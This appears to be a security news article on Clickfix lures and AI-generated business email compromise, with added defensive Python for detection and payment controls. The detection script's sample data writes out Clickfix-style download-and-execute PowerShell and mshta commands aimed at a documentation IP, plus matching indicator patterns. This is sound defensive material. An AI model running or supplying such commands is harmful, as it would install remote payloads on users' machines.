AI-Powered Hacking: How Clickfix Tools Are Breaching Systems

▼ Summary
– Clickfix social engineering attacks surged by 500% in early 2025, accounting for roughly 8% of all cyberattacks.
– Cybercriminals are increasingly using AI to create convincing Business Email Compromise scams, including fake email chains and deepfake content.
– AI-powered phishing and social engineering attacks are becoming harder to detect due to automated, targeted content generation.
– High-risk sectors for impersonation and social engineering include education, IT, legal, telecommunications, and real estate due to their access to sensitive data.
– Key defense recommendations include implementing multi-factor authentication, employee training, zero-trust architecture, and awareness of Clickfix tactics.
A dramatic 500% surge in Clickfix attacks during early 2025 signals a dangerous shift in cybercriminal tactics, where artificial intelligence is now being leveraged to craft highly convincing phishing and Business Email Compromise (BEC) scams. These methods increasingly target the human element, bypassing traditional security measures by tricking individuals into compromising their own systems. Recent analysis from Mimecast’s Global Threat Intelligence Report, which examined trillions of threat signals from the first three quarters of 2025, confirms that while familiar threats like ransomware and phishing persist, attackers are refining their focus toward social engineering with alarming efficiency.
Clickfix is a social engineering technique that sidesteps conventional anti-phishing defenses because nothing malicious has to reach the victim as an attachment or link. Instead, attackers present users with fake error messages, bogus technical alerts, fake human-verification (CAPTCHA) pages, or offers for free licensed software. These prompts come with step-by-step instructions that look like a fix but in fact walk the victim through opening PowerShell or the Windows Run dialog and pasting in a command the page has already placed on the clipboard. Once executed, that command downloads and runs the real payload: an information stealer, ransomware, or a remote access trojan. Mimecast's data indicates Clickfix now accounts for roughly 8% of all cyberattacks in its telemetry, a figure that underscores its growing popularity among threat groups.
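The execution step described above leaves process-creation telemetry even when the lure itself gets past mail and web filters. The Python below is an added example, not code from the article or from Mimecast: it triages constructed process-creation records (shaped loosely after Windows Security event 4688 / Sysmon event 1, with parent process and full command line) for the traits of a pasted Clickfix command: a download-and-execute cmdlet, a hidden window, an execution-policy bypass, an mshta launch of a remote HTA, a base64 -EncodedCommand (decoded and scanned as plaintext), and the "I am not a robot" comment that lure pages append so the Run dialog shows reassuring text. The field names, the set of interactive parent processes and the sample records are assumptions made for this example.

```python
import base64
import re

# Parents that indicate a human typed or pasted the command (Win+R / Run
# dialog and Start-menu launches are children of explorer.exe). Assumption
# for this example; a real rule set would also cover browser parents.
INTERACTIVE_PARENTS = {"explorer.exe"}

# -EncodedCommand and its short aliases take base64 of UTF-16LE script text.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Indicators typical of the command a ClickFix page asks the victim to run.
INDICATORS = [
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
     r"start-bitstransfer|bitsadmin)\b", "remote download"),
    (r"\b(iex|invoke-expression)\b", "invoke-expression"),
    (r"\bmshta(\.exe)?\s+https?://", "mshta remote HTA"),
    (r"(^|\s)-(w|windowstyle)\s+hidden\b", "hidden window"),
    (r"(^|\s)-(ep|executionpolicy)\s+bypass\b", "execution policy bypass"),
    # Lure pages append a comment so the Run dialog shows "verification" text.
    (r"#.*\b(not a robot|captcha|verification)\b", "ClickFix lure comment"),
]


def encode_ps(script):
    """Encode script text the way powershell -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(ev):
    """Score one process-creation record: id, verdict and the indicators that matched."""
    text = ev["cmdline"]
    indicators = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        indicators.append("encoded command")
        # Scan the plaintext instead of the base64 blob.
        text = ENCODED_RE.sub(" ", text) + "\n" + decoded
    for pattern, label in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            indicators.append(label)
    interactive = ev["parent"].lower() in INTERACTIVE_PARENTS
    return {"id": ev["id"], "suspicious": interactive and bool(indicators),
            "indicators": indicators}


def triage(events):
    return [analyse_event(ev) for ev in events]


# Constructed sample records, not real telemetry. 203.0.113.0/24 is a
# documentation address range.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://203.0.113.10/x.txt | iex" '
                '# I am not a robot - reCAPTCHA Verification ID: 7391'},
    {"id": 2, "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://203.0.113.10/verify.hta"},
    {"id": 3, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -EncodedCommand " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p.ps1')")},
    {"id": 4, "parent": "code.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-ChildItem C:\\src"},
    {"id": 5, "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\inventory.ps1"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok        "
        print(f'{flag} event {r["id"]}: {", ".join(r["indicators"]) or "-"}')
```

Commands pasted into an already-open console do not create a new process, so the same indicator list should also be run over PowerShell script block logs (event 4104). Treating the interactive parent as a hard requirement keeps management-tool launches such as event 5, which trips the execution-policy indicator on its own, out of the alert queue.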
According to Hiwot Mendahun, a Threat Research Engineer at Mimecast, cybercriminals are increasingly adopting Clickfix for initial network access. She notes that this technique is expected to remain a favored method for deploying infostealers, ransomware, and custom malware. Mendahun also highlighted a parallel rise in the abuse of Remote Monitoring and Management (RMM) tools, with campaigns heavily emphasizing social engineering to deceive targets.
In parallel, AI is revolutionizing Business Email Compromise schemes. While impersonating executives or vendors is not new, AI tools now generate entire fabricated email threads that mimic conversations between multiple parties, including vendors, employees, and high-level executives. Attackers gather intelligence during reconnaissance, accessing financial reports, HR data, or payroll details, then use AI to create a false sense of urgency, such as demanding immediate invoice payments. Recent BEC attacks have centered on fraudulent invoices, altered bank details, payroll updates, and wire transfer requests. As AI technology becomes more accessible, these schemes are not only more convincing but also easier for less-skilled criminals to execute.
Mendahun explained that AI allows threat actors to automate the creation of targeted email threads, potentially evading content-based detection systems. She also pointed to the emerging use of deepfake audio and video in BEC campaigns, which significantly boosts the success rate for large-scale fraudulent transactions.
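Because the body of an AI-generated thread can read as entirely plausible, one useful complement to content filtering is to check the structure around it: whether the sender domain is a lookalike of a trusted one, whether Reply-To silently diverts replies elsewhere, whether an executive's name is being used from an outside address, and whether the quoted earlier messages correspond to Message-IDs the organization's mail system actually handled (a fabricated thread cites messages that never existed). The Python below is an added example, not code from the article or from Mimecast; the domains, the executive list, the known Message-ID set and both sample messages are constructed for illustration.

```python
import email
import re
from email.utils import parseaddr

# Constructed reference data; a real deployment would pull these from the
# directory, the vendor master and mail-transport logs.
ORG_DOMAIN = "example-corp.com"
TRUSTED_DOMAINS = {ORG_DOMAIN, "acme-vendor.example"}
EXECUTIVES = {"dana whitfield"}
KNOWN_MESSAGE_IDS = {"<thread-9e1@example-corp.com>"}   # IDs the org's MTA has actually seen

URGENCY = re.compile(r"\b(today|urgent|immediately|new (bank )?account|updated bank|wire)\b", re.I)
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s", "7": "t"})


def edit_distance(a, b):
    """Levenshtein distance, used to spot one-character lookalike domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(header_value):
    return parseaddr(header_value)[1].rsplit("@", 1)[-1].lower()


def lookalike_of(domain):
    """Return the trusted domain that `domain` imitates, or None if it is trusted or unrelated."""
    if domain in TRUSTED_DOMAINS:
        return None
    for trusted in TRUSTED_DOMAINS:
        if domain.translate(HOMOGLYPHS) == trusted or edit_distance(domain, trusted) <= 1:
            return trusted
    return None


def analyse_message(raw):
    """Return a list of structural findings; an empty list means nothing stood out."""
    msg = email.message_from_string(raw)
    findings = []
    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rsplit("@", 1)[-1].lower()
    imitated = lookalike_of(from_domain)
    if imitated:
        findings.append(f"sender domain {from_domain} looks like {imitated}")
    reply_to = msg.get("Reply-To")
    if reply_to and domain_of(reply_to) != from_domain:
        findings.append("Reply-To domain differs from From domain")
    if any(name in display_name.lower() for name in EXECUTIVES) and from_domain != ORG_DOMAIN:
        findings.append(f"display name '{display_name}' matches an executive but the address is external")
    # A genuine reply chains to messages the MTA has logged; a fabricated one cannot.
    refs = set((msg.get("References", "") + " " + msg.get("In-Reply-To", "")).split())
    unknown = refs - KNOWN_MESSAGE_IDS
    if unknown:
        findings.append(f"quoted thread cites {len(unknown)} message ID(s) the mail system never handled")
    if re.match(r"\s*(re|fw|fwd):", msg.get("Subject", ""), re.I) and not refs:
        findings.append("claims to be a reply but carries no In-Reply-To/References")
    body = msg.get_payload() if not msg.is_multipart() else ""
    hits = sorted({m.group(0).lower() for m in URGENCY.finditer(body)})
    if hits:
        findings.append("payment urgency language: " + ", ".join(hits))
    return findings


# Constructed sample messages (not real mail).
BEC_SAMPLE = """\
From: "Dana Whitfield" <dana.whitfield@examp1e-corp.com>
Reply-To: <d.whitfield@mail-example.net>
To: ap@example-corp.com
Subject: RE: RE: Invoice 4471 - updated banking details
Message-ID: <c3f1@examp1e-corp.com>
In-Reply-To: <thread-9f2@example-corp.com>
References: <thread-9e1@example-corp.com> <thread-9f2@example-corp.com>

Per the thread below with Finance, please wire invoice 4471 to the new account today.
"""

BENIGN_SAMPLE = """\
From: "Dana Whitfield" <dana.whitfield@example-corp.com>
To: ap@example-corp.com
Subject: RE: Q3 close timeline
Message-ID: <d7a2@example-corp.com>
In-Reply-To: <thread-9e1@example-corp.com>
References: <thread-9e1@example-corp.com>

Thanks, the timeline looks fine. No changes to vendor payments this week.
"""

if __name__ == "__main__":
    for label, sample in (("BEC", BEC_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, analyse_message(sample) or "no findings")
```

None of these checks reads the prose the model wrote, which is the point: a fabricated thread has to invent Message-IDs, and a lookalike domain or diverted Reply-To is visible regardless of how natural the text sounds.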
Industries most vulnerable to these impersonation and social engineering attacks include education, information technology, telecommunications, legal services, and real estate. These sectors are targeted because they frequently handle high-value transactions, manage confidential client information, and have direct access to sensitive financial systems. Mimecast observed that social engineering attacks against real estate firms are climbing steadily, suggesting some criminal groups may be shifting focus from traditional targets to this industry. Notorious threat groups such as Scattered Spider and TA2541 have been associated with attacks on these sectors.
While phishing and social engineering are age-old problems, their execution continues to evolve, and Clickfix adds a particularly hazardous dimension. To mitigate risk, organizations should consider several defensive measures:
– Additional authentication and authorization checks for payments. Invoices, bank-detail changes, payroll updates and wire requests should require confirmation through a second channel (a call to the number already on file, never to one supplied in the e-mail) and approval from more than one person or department, so a fraudulent request is intercepted before funds move.
– Multi-factor authentication (MFA) provides a critical safety net: even if a password is phished, MFA can prevent account takeover. Prefer phishing-resistant methods such as FIDO2 security keys or passkeys, since one-time codes and push prompts can be relayed by adversary-in-the-middle phishing kits.
– Ongoing training and awareness programs are essential, especially for staff with privileged access or roles involving payment systems. Training should be frequent and updated to cover emerging threats like BEC and Clickfix, not treated as a one-time event.
– A zero-trust architecture with least-privilege access, so that employees reach only the resources their role requires, limits how far a single compromised account or endpoint can take an attacker.
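One way to turn the additional authentication and authorization checks recommended above into a policy that accounts-payable tooling can enforce, added here as an example and not drawn from the article or any product: the request must come from the vendor's registered domain, a changed bank account is accepted only after a callback to the number already on file, and amounts above a threshold need two approvers from two different departments. The vendor record, the threshold and the sample requests are constructed for illustration.

```python
from dataclasses import dataclass, field


@dataclass
class VendorRecord:
    vendor_id: str
    email_domain: str      # domain the vendor was onboarded with
    bank_account: str      # account on the vendor master record
    phone_on_file: str     # number AP must call to confirm any change


@dataclass
class PaymentRequest:
    vendor_id: str
    amount: float
    bank_account: str
    requested_from: str                               # address the request arrived from
    approvers: list = field(default_factory=list)     # (user, department) pairs
    callback_verified_to: str = ""                    # number AP actually called, "" if none


# Constructed vendor master; the IBAN and phone values are fictitious.
VENDORS = {
    "V-1042": VendorRecord("V-1042", "acme-vendor.example",
                           "DE89 3704 0044 0532 0130 00", "+49 30 555 0100"),
}
DUAL_CONTROL_THRESHOLD = 10_000.0


def evaluate_payment(req):
    """Return the reasons a request must be held; an empty list means it may proceed."""
    vendor = VENDORS.get(req.vendor_id)
    if vendor is None:
        return ["unknown vendor"]
    holds = []
    if req.requested_from.rsplit("@", 1)[-1].lower() != vendor.email_domain:
        holds.append("request did not originate from the vendor's registered domain")
    if req.bank_account != vendor.bank_account and req.callback_verified_to != vendor.phone_on_file:
        # A number quoted inside the e-mail is under the attacker's control; only the
        # number already on file counts as an independent channel.
        holds.append("bank details differ from vendor master and were not confirmed "
                     "by callback to the number on file")
    if req.amount >= DUAL_CONTROL_THRESHOLD:
        users = {u for u, _ in req.approvers}
        departments = {d for _, d in req.approvers}
        if len(users) < 2 or len(departments) < 2:
            holds.append("amount requires two approvers from two different departments")
    return holds


if __name__ == "__main__":
    # Lookalike sender, new account, callback made to the number printed in the e-mail.
    fraud = PaymentRequest("V-1042", 48_500.0, "GB29 NWBK 6016 1331 9268 19",
                           "billing@acme-vend0r.example", approvers=[("alice", "AP")],
                           callback_verified_to="+44 20 7946 0958")
    for reason in evaluate_payment(fraud):
        print("HOLD:", reason)
```

Segregation of duties is deliberately expressed as two distinct users and two distinct departments, so a single compromised approver account cannot satisfy the rule by approving twice.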
Regarding Clickfix specifically, conventional anti-phishing tools are largely ineffective because no malicious attachment or link is delivered; the attack manipulates users into running the command themselves. Raising awareness of this technique is crucial: employees must understand that pasting unfamiliar commands into PowerShell or the Run dialog can lead to full system compromise. The execution step does still leave traces, so PowerShell script block logging and process command-line auditing, fed to an EDR or SIEM, give defenders a way to catch it even when the lure got through.
(Source: ZDNET)